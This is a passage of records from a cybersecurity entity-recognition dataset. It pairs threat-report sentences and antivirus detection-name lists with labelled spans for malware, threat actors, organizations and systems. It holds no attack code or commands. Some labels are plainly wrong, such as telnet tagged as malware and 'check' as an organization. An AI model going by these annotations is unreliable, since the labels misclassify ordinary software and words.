"ORGANIZATION: vendors": [[40, 47]], "ORGANIZATION: industrial automation solutions": [[51, 82]], "ORGANIZATION: system support contractors.": [[87, 114]]}, "info": {"id": "cyner2_train_003017", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-PWS/W32.WebGame.18432.Y Trojan-PSW.Win32.Maran!O Trojan/PSW.Maran.ij W32/Pws.QZP Infostealer.Phax TSPY_MARAN.ANC Trojan-PSW.Win32.Maran.sv Trojan.Win32.Maran.jzdr Trojan.Win32.Z.Maran.18432.A Troj.GameThief.W32.OnLineGames.l9d5 TrojWare.Win32.PSW.Maran.NAH Trojan.PWS.Maran.591 Trojan.Win32.6BC1FBA9 TSPY_MARAN.ANC BehavesLike.Win32.SpywareLyndra.lh Trojan/PSW.Maran.ej Trojan[PSW]/Win32.Maran Trojan.Graftor.D18418 Trojan-PSW.Win32.Maran.sv PWS:Win32/Maran.M Trojan/Win32.Magania.C87823 TrojanPSW.Maran Trj/Maran.BK Win32/PSW.Maran.NAH Trojan.PWS.Maran!SDdAAxRuS44 Trojan-GameThief.Win32.OnLineGames W32/MARAN.SV!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003018", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Win-Trojan/MSILKrypt02.Exp Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003020", "source": "cyner2_train"}} {"text": "Sakula is a well known malware variant linked to several significant targeted intrusion campaigns over the past 2-3 years.", "spans": {"MALWARE: Sakula": [[0, 6]], "MALWARE: malware": [[23, 30]], "THREAT_ACTOR: targeted intrusion campaigns": [[69, 97]]}, "info": {"id": "cyner2_train_003021", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9964 BehavesLike.Win32.Trojan.mz Trojan/Win32.LockScreen.C1515946", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003022", "source": "cyner2_train"}} {"text": "Also, the samples analyzed have the ability detect the presence of a virtual machine to ensure it's not being analyzed in a network sandbox.", "spans": {"SYSTEM: virtual machine": [[69, 
84]], "SYSTEM: network sandbox.": [[124, 140]]}, "info": {"id": "cyner2_train_003023", "source": "cyner2_train"}} {"text": "The current version of the malware allows the operator to steal files, keystrokes, perform screenshots, and execute arbitrary code on the infected host.", "spans": {"MALWARE: malware": [[27, 34]], "THREAT_ACTOR: operator": [[46, 54]], "SYSTEM: the infected host.": [[134, 152]]}, "info": {"id": "cyner2_train_003027", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Razy.D39D3F Trojan.Win32.KillProc.hd Trojan.BtcMine.2050 Trojan/Win32.KillProc TrojanDownloader:MSIL/Taily.A!bit RiskWare.BitCoinMiner Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003028", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32/Trojan.AHSJ-4985 Ransom_HC7.R002C0DAA18 Trojan.Win32.RedCap.ewxmze Virus.Ransom.Pycl.A!c TR/RedCap.qcvri Trojan/Win32.Ransom.C2347549 Trojan.Ransom.PyCL Ransom.FileLocker Trojan.DownLoader! Ransom.Win32 Trojan-Ransom.Crypren Trj/CI.A Win32/Trojan.Ransom.97f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003029", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Infostealer.Limitail Trojan.DownLoader26.6005 BehavesLike.Win32.Trojan.cm Trojan.MSIL.Injector Trojan.MSIL.Bladabindi.1 Trojan/Win32.RatTool.R208188 Trj/GdSda.A MSIL/SpyPSW.AVQ!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003032", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Strictor.D1B6BC BKDR_HPKELIHOS.SM4 Win32.Trojan.WisdomEyes.16070401.9500.9990 BKDR_HPKELIHOS.SM4 BehavesLike.Win32.Expiro.ch Trojan.WPCracker.u Trojan.Win32.Boaxxe W32/Injector.DDXZ!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003033", "source": "cyner2_train"}} {"text": "RIG Exploit Kit - May 2015", "spans": {"MALWARE: RIG Exploit Kit": [[0, 15]]}, "info": {"id": 
"cyner2_train_003034", "source": "cyner2_train"}} {"text": "Compared to other adversary groups, C0d0so0 has shown the use of more sophisticated tactics and tools and has been linked to leveraging zero-day exploits on numerous occasions in combination with watering hole and spear phishing attacks.", "spans": {"THREAT_ACTOR: adversary groups, C0d0so0": [[18, 43]], "MALWARE: tools": [[96, 101]], "VULNERABILITY: zero-day exploits": [[136, 153]]}, "info": {"id": "cyner2_train_003035", "source": "cyner2_train"}} {"text": "Although Unit 42 cannot provide a full picture of the details surrounding the delivery of these samples, we are confident this activity targets Korean language speakers who use Samsung devices.", "spans": {"ORGANIZATION: Unit 42": [[9, 16]], "MALWARE: samples,": [[96, 104]], "ORGANIZATION: Korean language speakers": [[144, 168]], "SYSTEM: Samsung devices.": [[177, 193]]}, "info": {"id": "cyner2_train_003036", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/Cosmu.aqmz Trojan.Win32.Cosmu.divg Trojan.Win32.Z.Cosmu.1849214 W32.Dzan.l3Vn Trojan.DownLoader19.64657 Trojan.Cosmu.Win32.7698 Trojan-Dropper.Win32.Injector Trojan/Cosmu.mih Trojan[Downloader]/Win32.Wren Trojan.Win32.Cosmu.divg Trojan.Cosmu Trj/CI.A Win32.Trojan.Cosmu.Dypy W32/Malicious_Behavior.VEX Win32/Worm.15b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003037", "source": "cyner2_train"}} {"text": "The attacks came to light when a bank in Poland discovered previously unknown malware running on a number of its computers.", "spans": {"ORGANIZATION: bank": [[33, 37]], "MALWARE: unknown malware": [[70, 85]], "SYSTEM: computers.": [[113, 123]]}, "info": {"id": "cyner2_train_003038", "source": "cyner2_train"}} {"text": "On each system several tools were used to find, encrypt, and delete the original files as well as any backups.", "spans": {"SYSTEM: system": [[8, 14]], "MALWARE: tools": [[23, 28]]}, "info": {"id": "cyner2_train_003039", "source": 
"cyner2_train"}} {"text": "Unit 42 researchers have uncovered a malware distribution campaign that is delivering the LokiBot information stealer via business email compromise BEC phishing emails", "spans": {"ORGANIZATION: Unit 42 researchers": [[0, 19]], "THREAT_ACTOR: malware distribution campaign": [[37, 66]], "MALWARE: LokiBot information stealer": [[90, 117]]}, "info": {"id": "cyner2_train_003041", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.Qhost.724992 Trojan.Win32.Qhost!O Trojan.BeeVry Trojan.Qhost Worm.AutoRun.Win32.64118 Win32.Worm.Autorun.ah W32/Trojan2.OFIZ W32.SillyFDC WORM_YAHLOVER.SM Trojan.Win32.Qhost.afes Trojan.Win32.Qhost.boicaq Trojan.Win32.A.Qhost.724992 Trojan.MulDrop3.42831 WORM_YAHLOVER.SM BehavesLike.Win32.Autorun.bt W32/Trojan.RWER-6321 Trojan/Qhost.gez Trojan/Win32.Qhost Troj.W32.Qhost.tn9x Trojan.Win32.Qhost.afes HEUR/Fakon.mwf W32/Autorun.worm.aadm Trojan.Qhost Trojan.Qhost Win32/AutoRun.VB.AVY Trojan.Qhost!hFnYX0CfRwA Worm.Win32.VB", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003042", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.DownloadDAB.Trojan Worm.MSIL.Arcdoor!O Worm.Arcdoor.ae3 Worm.Arcdoor.Win32.1086 Trojan/Arcdoor.ae MSIL.Worm.Arcdoor.b W32/Trojan2.NFSU Backdoor.Trojan Win32/Pontoeb.A BKDR_PONTOEB.SMHA Win.Trojan.Worm-74 Worm.MSIL.Arcdoor.ae Trojan.Win32.Arcdoor.ctsdhw Msil.Worm.Arcdoor.Lknq BKDR_PONTOEB.SMHA Worm.MSIL W32/Trojan.LEEP-1569 Worm.MSIL.fi WORM/MSIL.Arcdo.aea Worm/MSIL.Arcdoor Backdoor:MSIL/Pontoeb.G Trojan.Win32.Z.Arcdoor.26624 Worm.MSIL.Arcdoor.ae Worm/Win32.Arcdoor.R11889 MSIL/Arcdoor.AE MSIL/AntiVM.V!tr Win32/Worm.bed", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003044", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.LoadMoney.eprnxa PUP.LoadMoney/Variant Trojan.LoadMoney.2303 PUA.SearchGo ADWARE/SearchGo.avskt PUP/Win32.Searchgo.R201982 Adware.SearchGo", "spans": {"MALWARE: 
backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003046", "source": "cyner2_train"}} {"text": "The widespread use of telnet, along with a list of factory default usernames and passwords, result in botnets with sizes that is beyond imagination.", "spans": {"MALWARE: telnet,": [[22, 29]], "VULNERABILITY: factory default usernames and passwords,": [[51, 91]], "MALWARE: botnets": [[102, 109]]}, "info": {"id": "cyner2_train_003047", "source": "cyner2_train"}} {"text": "are designed to resemble tracking e-mails from different post offices around the world.", "spans": {"ORGANIZATION: post offices": [[57, 69]]}, "info": {"id": "cyner2_train_003048", "source": "cyner2_train"}} {"text": "The first section aims to analyze the malware's capabilities e.g.: c2 connectivity, encoding mechanisms and overall system activity.", "spans": {}, "info": {"id": "cyner2_train_003050", "source": "cyner2_train"}} {"text": "This RAT looks new to us; hence we suspected that it may either be a new RAT family or a custom RAT that was developed for a specific attacker hacker", "spans": {"MALWARE: RAT": [[5, 8], [73, 76]], "MALWARE: custom RAT": [[89, 99]], "THREAT_ACTOR: a specific attacker hacker": [[123, 149]]}, "info": {"id": "cyner2_train_003051", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Clod3a9.Trojan.e28b Win32.Trojan.WisdomEyes.16070401.9500.9998 Backdoor.Trojan trojan.win32.skeeyah.a!rfn W32/Trojan.FVPV-5651 TR/Crypt.ZPACK.mwex TrojanDropper:Win32/Barlaiy.A!dha Trojan-Downloader.Win32.FraudLoad Trj/CI.A Win32/Trojan.0e6", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003053", "source": "cyner2_train"}} {"text": "This cyber-espionage group was dubbed Rocket Kitten,' and remains active as of this writing, with reported attacks as recent as October 2015.", "spans": {"THREAT_ACTOR: cyber-espionage group": [[5, 26]], "THREAT_ACTOR: Rocket Kitten,'": [[38, 53]], "MALWARE: attacks": [[107, 114]]}, "info": {"id": "cyner2_train_003054", 
"source": "cyner2_train"}} {"text": "Late last week Talos researchers noticed a drastic uptick in Angler Exploit Kit activity.", "spans": {"ORGANIZATION: Talos researchers": [[15, 32]], "MALWARE: Angler Exploit Kit": [[61, 79]]}, "info": {"id": "cyner2_train_003055", "source": "cyner2_train"}} {"text": "This blog presents our analysis of one of the latest malware variants targeting individuals in Taiwan, which exhibits some interesting characteristics that can be useful for detecting and defending against the threat – including the creation of an obese file, weighing in at 500MB, as part of its execution.", "spans": {"MALWARE: malware variants": [[53, 69]], "MALWARE: threat": [[210, 216]]}, "info": {"id": "cyner2_train_003056", "source": "cyner2_train"}} {"text": "CitizenLab connect the infrastructure used in the campaign to previous malware operations targeting a Tibetan radio station and the Thai government.", "spans": {"ORGANIZATION: CitizenLab": [[0, 10]], "SYSTEM: infrastructure": [[23, 37]], "THREAT_ACTOR: campaign": [[50, 58]], "MALWARE: malware operations": [[71, 89]], "ORGANIZATION: Tibetan radio station": [[102, 123]], "ORGANIZATION: the Thai government.": [[128, 148]]}, "info": {"id": "cyner2_train_003059", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Zlob.60259 Trojan.NSIS.StartPage.Q Trojan.Zlob.60259 Win32/SillyDl.YHD Win.Trojan.NSIS-38 Trojan-Downloader.Win32.NSIS.io Trojan.Zlob.60259 Riskware.Nsis.Adw.cxexqq Troj.Downloader.W32.Lipler.lkqh Trojan.Zlob.60259 Trojan.Fakealert.26734 BehavesLike.Win32.AdwareSearchProtect.kc TrojanDownloader:Win32/Gabeerf.A Trojan.Zlob.DEB63 Trojan.Win32.Banker.140384 Trojan.Zlob.60259 Trojan/Win32.StartPage.R26935 Trojan.NSIS", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003060", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.AutoRunLUL.Worm Trojan.Downloader.Bredolab.AA Packed.Win32.Tadym!O Trojan.Tadym Downloader-BTR.a 
Trojan.Downloader.Bredolab.AA TROJ_BREDLAB.SMB Win32.Trojan.WisdomEyes.16070401.9500.9994 TROJ_BREDLAB.SMB Win.Trojan.Bredolab-4616 Packed.Win32.Tadym.b Trojan.Downloader.Bredolab.AA Trojan.Win32.Tadym.deqzho Win32.Packed.Tadym.Pdmb Trojan.Downloader.Bredolab.AA TrojWare.Win32.TrojanDropper.HDrop.B Trojan.Downloader.Bredolab.AA Win32.HLLW.Autoruner.6644 Backdoor.CPEX.Win32.27835 BehavesLike.Win32.RAHack.mc Worm/AutoRun.nlq Trojan[Packed]/Win32.Tadym TrojanDropper:Win32/Emold.C Troj.W32.Vaklik.l3JH Packed.Win32.Tadym.b Trojan.Downloader.Bredolab.AA Trojan.Downloader.Bredolab.AA BScope.Trojan.Ballast Worm.AutoRun!kxuXEtVXF84 Trojan.Win32.Bredolab", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003061", "source": "cyner2_train"}} {"text": "InPage is a word processor program that supports languages such as Urdu, Persian, Pashto, and Arabic.", "spans": {"SYSTEM: InPage": [[0, 6]], "SYSTEM: word processor program": [[12, 34]]}, "info": {"id": "cyner2_train_003062", "source": "cyner2_train"}} {"text": "This operation is another example of a threat actor using just enough technical sophistication to exploit a target.", "spans": {"THREAT_ACTOR: This operation": [[0, 14]], "THREAT_ACTOR: threat actor": [[39, 51]], "VULNERABILITY: exploit": [[98, 105]]}, "info": {"id": "cyner2_train_003063", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FamVT.ExpiroPC.PE Trojan.Kazy.D765A4 Heur.Corrupt.PE BehavesLike.Win32.PWSGamania.dc HackTool.Win32.QQExplorer HackTool/Win32.QQExplorer HackTool:Win32/QQExplorer.1_26.dam#2 HackTool/Win32.QQExplorer.C1530039 Trj/CI.A Win32/Trojan.dd5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003066", "source": "cyner2_train"}} {"text": "A backdoor also known as: Ransom.Locky.D6 Trojan.Barys.DD3B9 W32.Pilleuz Win32.Trojan-Downloader.Kryptik.ER Trojan.Win32.Inject.ebobum Trojan.Win32.Z.Injector.119812 BackDoor.Andromeda.1478 Dropper.Injector.Win32.77187 BehavesLike.Win32.PWSZbot.ch 
W32/Trojan.LSBE-5509 TrojanDropper.Injector.bhwe Backdoor:Win32/Wondufi.A TrojanDropper.Injector Trj/GdSda.A Trojan.DR.Injector!1yj9x8ODPcQ W32/Kryptik.FIKL!tr Win32/Trojan.02c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003068", "source": "cyner2_train"}} {"text": "Some of the more interesting commands include : SMS Control Update the address of the C & C server — SMS starting with “ http : // ” Send AES-encrypted SMS message back to sender — SMS starting with “ sms : // ” Update service wake-up interval — “ 2 ” Kill switch — “ 4 ” C & C Control Update the address of the C & C server — “ 1 ” Update service wake-up interval — “ 2 ” Lock the screen — “ 5 ” Display a picture in a WebView from an arbitrary URL — “ 11 ” Send an arbitrary SMS message — “ 8 ” Steal images saved on the device — “ 12 ” and “ 13 ” Use the accessibility service to become the default SMS app — “ 6 ” Enable recording of other apps — “ 15 ” Kill switch — “ 4 ” The Lockdown Screen Most thieves don ’ t want to be caught red-handed as they steal — they want to buy some time to get away with the loot .", "spans": {}, "info": {"id": "cyner2_train_003069", "source": "cyner2_train"}} {"text": "Many of these samples have not been discussed publicly and several have very little or no anti-virus coverage.", "spans": {}, "info": {"id": "cyner2_train_003070", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor/W32.Lithium.38400 Backdoor.Lithium.F Win32/Lithium.102 Backdoor.Trojan W32/LithBack.1_02 BKDR_LITH.102.A Win32.Lithium.102.a Backdoor.Win32.Lithium.102 Backdoor.Lithium.1.0.2 Backdoor.Win32.Lithium.102!IK Backdoor.Win32.Lithium.102 Backdoor.Lithium.1.0.2 BackDoor.Lithium.102 BDS/Lithium.102.Srv BKDR_LITH.102.A Win32/Lithium.D Backdoor/Lithium.102 Backdoor:Win32/Lithium.1_02 Backdoor.Win32.Lithium_102.38400 Backdoor.Lithium.1.0.2 Win-Trojan/Lithium.38400 Backdoor.Lithium.102 Backdoor.Trojan Backdoor.Lithium.102.b Backdoor.Win32.Lithium.102 
W32/Lithium!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003071", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanDownloader.Admedia Multi.Threats.InArchive Trojan.Dropper Win32/Donnic.D Win.Downloader.Small-3527 Trojan-Downloader.Win32.QQHelper.va Trojan.Win32.QQHelper.ybwad Troj.Downloader.W32!c Trojan.DownLoader.14343 Backdoor.CPEX.Win32.15449 BehavesLike.Win32.Backdoor.tc Trojan-Downloader.Win32.QQHelper TrojanDownloader.VB.lr TR/Dldr.Harnig.5 Trojan[Downloader]/Win32.QQHelper Trojan:Win32/Zaptusk.A Trojan-Downloader.Win32.QQHelper.va Worm.WhiteIce Trj/Multidropper.BQE Win32.Trojan-downloader.Qqhelper.Dzaq Win32/Trojan.Downloader.c98", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003074", "source": "cyner2_train"}} {"text": "After spending more time analyzing the proxy, we realized that the requests we were receiving were not related to ad-fraud activity as we initially suspected but instead appeared to be for some sort of VPN service.", "spans": {"SYSTEM: VPN service.": [[202, 214]]}, "info": {"id": "cyner2_train_003075", "source": "cyner2_train"}} {"text": "A backdoor also known as: AutoIt.Trojan.Injector.bq Trojan.Autoit W32/Injector.COJ!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003076", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Obfuscated.KU Trojan.Win32.Inject!O Trojan.Inject.Win32.41934 Trojan/Inject.bsb Win32.Trojan.WisdomEyes.16070401.9500.9746 Win.Trojan.Inject-12484 Trojan.Obfuscated.KU Trojan.Obfuscated.KU Trojan.Win32.Inject.cwlvrx AdWare.W32.Cinmus.kYTY Trojan.Obfuscated.KU Trojan.DownLoader1.2110 Trojan.Win32.Malware.a Trojan.Rootkit Trojan/Win32.Inject Win32.Adware.CinmusT.lm.230980 Trojan.Obfuscated.KU Trojan:Win32/Cinmus.K Trojan/Win32.Inject.C140611 Trojan.Obfuscated.KU Trojan.Win32.Malware.a SScope.Trojan.Cinmus.39 Win32.Trojan.Inject.bidk Trojan.Inject!Lqw/iuX+8xA W32/Malware_fam.NB", "spans": 
{"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003078", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Multi Trojan.Foreign.Win32.57563 Trojan.Johnnie.D12DD3 Trojan-Ransom.Win32.Foreign.nxyh Trojan.Win32.Panda.exmste Trojan.Win32.Z.Johnnie.582144 Trojan.PWS.Panda.12917 BehavesLike.Win32.Backdoor.hc Trojan.Win32.Crypt W32/Trojan.MEZF-9098 TR/AD.PepaBot.pabel TrojanDropper:Win32/Ropest.A Trojan-Ransom.Win32.Foreign.nxyh TrojanPSW.Panda Trj/GdSda.A W32/Kryptik.FQTY!tr Win32/Trojan.acd", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003079", "source": "cyner2_train"}} {"text": "Dozens of targets may receive the exact same message.", "spans": {}, "info": {"id": "cyner2_train_003080", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.Dialer.10624 Trojan.Dialer.AY Trojan/Dialer.ay Trojan.Dialer.AU1 W32/Qdialer.J Dialer.DialPlatform Win32/SilentCaller.D TROJ_MALQES.A Trojan.Win32.Dialer.ay Trojan.Dialer.AY Trojan.Win32.Dialer.ay!IK TrojWare.Win32.Dialer.NAD Dialer.Silent TR/Drop.Delf.DJ.3 TROJ_MALQES.A Trojan/Dialer.ay Trojan:Win32/Adialer.AX Trojan.Win32.Dialer.10656 Win-AppCare/Dialer.10624 Trojan.Dialer.AY W32/Qdialer.J OScope.Dialer.VL Win32/Dialer.NAD Trojan.Win32.Dialer.ay Dialer.8.AP", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003081", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.Inject.68935 Packed.Win32.TDSS!O Trojan/Inject.oc Win32.Trojan.WisdomEyes.16070401.9500.9868 Backdoor.Trojan Trojan.Win32.Inject.oc Trojan.Win32.Inject.wpzg Troj.W32.Inject.oc!c BackDoor.Exte BehavesLike.Win32.Backdoor.kc Net-Worm.Win32.Mofeir Trojan/Inject.amwy Trojan/Win32.Inject Trojan:Win32/Oexsi.A Trojan.Win32.Inject.oc Trojan/Win32.Inject.C27812 Trojan.Inject Trojan.Downloader W32/BanLoader.AAAC!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003082", "source": "cyner2_train"}} {"text": "A backdoor also known 
as: TROJ_KREP.D Trojan.DownLoad3.10695 Trojan.Swisyn.Win32.8140 TROJ_KREP.D Trojan/Swisyn.jnt Trojan:Win32/Trixpi.A Trojan-Downloader.win32.Delf.xoq W32/Mdrop.CQO!tr Trojan.Win32.Trixpi.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003083", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor/W32.SdBot.25088.Q Backdoor/Afbot.a BKDR_POEBOT.DK Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Trojan BKDR_POEBOT.DK Backdoor.Win32.Afbot.a Trojan.Win32.Afbot.daze Backdoor.Win32.S.Afbot.25088 Backdoor.W32.Afbot.a!c Backdoor.Win32.Afbot.~A BackDoor.IRC.Afbot Backdoor.Afbot.Win32.1 Backdoor/Afbot.a Trojan[Backdoor]/Win32.Afbot Backdoor:Win32/Afbot.A Backdoor.Win32.Afbot.a Backdoor.Afbot Bck/Iroffer.BG Win32.Backdoor.Afbot.Szbp Backdoor.Afbot!ktevPrMqQWw W32/Afbot.A!tr.bdr Win32/Backdoor.BO.3c4", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003084", "source": "cyner2_train"}} {"text": "These SQL servers are also used for command and control C2 functionality.", "spans": {"SYSTEM: SQL servers": [[6, 17]]}, "info": {"id": "cyner2_train_003087", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Cosmu!O Worm.NadIote Trojan.Cosmu.Win32.2079 Win32.Worm.VB.pf W32/Risk.BXNI-0011 Win32/VB.AZL Trojan.Win32.Cosmu.ist Trojan.Win32.Cosmu.cojafm Win32.Trojan.Cosmu.Eehn Worm.Win32.Pronny.BL Win32.HLLW.Autoruner.14654 BehavesLike.Win32.VBObfus.fm W32/MalwareS.AKRW Trojan/Cosmu.pri Trojan/Win32.Cosmu Trojan.Win32.Cosmu.315392.A Trojan.Win32.Cosmu.ist HEUR/Fakon.mwf Trojan.VBO.05376 Trojan.Cosmu Win32/AutoRun.Spy.VB.E Trojan.Cosmu!52KOHqBZvHU", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003089", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Mauvaise.SL1 Win32.Trojan.WisdomEyes.16070401.9500.9950 Backdoor.Noknef TSPY_KONNI.A Trojan.Win32.Graftor.eoiwlz Dropper.S.Konni.266752 Trojan.MulDrop7.31720 TSPY_KONNI.A BehavesLike.Win32.Fake.dm 
W32/Trojan.NPTT-8320 TR/Graftor.266752.17 Trojan:Win32/Konny.A Backdoor.Noknef Backdoor.Win32.Hupigon Malicious_Behavior.SB", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003090", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Heur2.FU.E930ED Backdoor.Trojan Adware.Mutabaha.1206 Trojan:Win32/Winnti.V!dha Trojan.Win32.Z.Svchorse.725184 BScope.Trojan.SvcHorse.01643 PossibleThreat.SB!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003091", "source": "cyner2_train"}} {"text": "Wild Neutron hit the spotlight in 2013, when it successfully infected companies such as Apple, Facebook, Twitter and Microsoft.", "spans": {"MALWARE: Wild Neutron": [[0, 12]], "ORGANIZATION: companies": [[70, 79]], "ORGANIZATION: Apple, Facebook, Twitter": [[88, 112]], "ORGANIZATION: Microsoft.": [[117, 127]]}, "info": {"id": "cyner2_train_003092", "source": "cyner2_train"}} {"text": "Triggers ET rules for: RadminRMS, XPCSpyPro, RemoteAdmin.RemoteUtilities.C", "spans": {"MALWARE: RadminRMS,": [[23, 33]], "MALWARE: XPCSpyPro,": [[34, 44]], "MALWARE: RemoteAdmin.RemoteUtilities.C": [[45, 74]]}, "info": {"id": "cyner2_train_003093", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Dropper.Win32.Mudrop!O Win32.Trojan.WisdomEyes.16070401.9500.9756 Win.Trojan.VB-472 Trojan-Dropper.Win32.Mudrop.bq Trojan.MulDrop.5694 Downloader.VB.Win32.99231 BehavesLike.Win32.RAHack.hh TrojanDropper.Mudrop.dv Trojan[Dropper]/Win32.Mudrop TrojanDropper:Win32/Popuper.N Trojan.Downloader-SysMon Trojan-Dropper.Win32.Mudrop.bq TScope.Malware-Cryptor.SB Trojan-Dropper.Win32.Mudrop", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003094", "source": "cyner2_train"}} {"text": "These include domains, file names, Java package names, and Facebook activity.", "spans": {}, "info": {"id": "cyner2_train_003095", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Inject.Win32.243804 
Trojan.Win32.Delphi.ewuekh Trojan[Backdoor]/MSIL.NanoBot Trojan/Win32.Injector.R217510 Trojan.Symmi.D14210", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003096", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Loselove.A Backdoor.Loselove.A Trojan.Win32.Loselove.makvn Backdoor.Trojan BKDR_LOSELOVE.A Win32.Trojan Backdoor.Win32.Loselove Backdoor.Loselove.A Backdoor.Loselove.B Backdoor.Win32.Loselove.765952 Backdoor.Win32.Loselove.10 Backdoor.Loselove.A BackDoor.Loselove BDC/Loselove.1 BKDR_LOSELOVE.A Backdoor/LostLove.Client Win32.Hack.Loselove.kcloud Win-Trojan/Loselove.765952 Backdoor.Loselove.A Backdoor.Trojan Win32/Loselove.10 Backdoor.Win32.Loselove W32/Loselove.A!tr.bdr BackDoor.Loselove.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003098", "source": "cyner2_train"}} {"text": "Potential infrastructure used to launch phishing attacks against the Macron presidential campaign.", "spans": {"SYSTEM: infrastructure": [[10, 24]], "ORGANIZATION: the Macron presidential campaign.": [[65, 98]]}, "info": {"id": "cyner2_train_003099", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.DownLoader24.49714 TR/Crypt.Xpack.enmvj Trojan/Win32.Invader Trojan.Graftor.D5A2C5 TrojanDownloader:Win32/Furs.A Trojan.Inject Trj/CI.A Win32/Trojan.223", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003100", "source": "cyner2_train"}} {"text": "McAfee Labs has found that the latest Rovnix downloader now comes with the capability to check for the sinkholing of its control servers.", "spans": {"ORGANIZATION: McAfee Labs": [[0, 11]], "MALWARE: Rovnix downloader": [[38, 55]], "ORGANIZATION: check": [[89, 94]]}, "info": {"id": "cyner2_train_003101", "source": "cyner2_train"}} {"text": "MuddyWater attacks are characterized by the use of a slowly evolving PowerShell-based first stage backdoor we call POWERSTATS", "spans": {"THREAT_ACTOR: MuddyWater": [[0, 10]], "SYSTEM: 
PowerShell-based": [[69, 85]], "MALWARE: backdoor": [[98, 106]], "MALWARE: POWERSTATS": [[115, 125]]}, "info": {"id": "cyner2_train_003105", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Alaveensee Win32.Trojan.WisdomEyes.16070401.9500.9994 W32/Trojan.YNOK-2169 Trojan.DownLoader10.48462 Trojan.Graftor.D1D3B0 Backdoor:Win32/Alaveensee.AC!bit Trojan.DownLoader!", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003106", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Dellogkbms.Trojan Trojan/W32.Small.40960.JU Trojan.Win32.ShipUp!O Trojan.Shipup.H5 Trojan.ShipUp.Win32.175 Trojan/ShipUp.nak Trojan.Zusy.DAD3 Win32.Trojan.WisdomEyes.16070401.9500.9999 TSPY_SHIPUP_CA080195.TOMC Win.Trojan.Shipup-7 Trojan.Win32.ShipUp.fufz Trojan.Win32.ShipUp.ijffr Win32.Trojan.Shipup.Isq TrojWare.Win32.ShipUp.NAK Trojan.Shipup.192 TSPY_SHIPUP_CA080195.TOMC 